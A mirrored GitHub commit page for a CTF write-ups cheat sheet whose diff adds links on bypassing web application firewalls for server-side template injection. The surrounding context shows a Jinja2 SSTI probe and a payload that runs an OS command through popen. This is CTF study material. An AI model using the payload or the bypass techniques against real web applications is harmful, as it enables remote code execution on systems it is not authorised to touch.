mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-25 05:10:23 +00:00
Update Cheat Sheet.md
This commit is contained in:
ARZ
GitHub
parent
ef195c1719
commit
496bd71462
1 changed files with 5 additions and 0 deletions
|
|
@ -529,6 +529,11 @@ Check for `{{4*4}}` on the url `http://IP/{{4*4}}` if it returns "16" as a resul
|
|||
**Exploit**<br/>
|
||||
`{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}`
|
||||
|
||||
### SSTI WAF Bypass
|
||||
|
||||
- https://chowdera.com/2020/12/20201221231521371q.html
|
||||
- https://www.fatalerrors.org/a/0dhx1Dk.html
|
||||
- https://hackmd.io/@Chivato/HyWsJ31dI
|
||||
|
||||
|
||||
### XSS Session Hijacking
|
||||
|
|
|
|||
Loading…
Reference in a new issue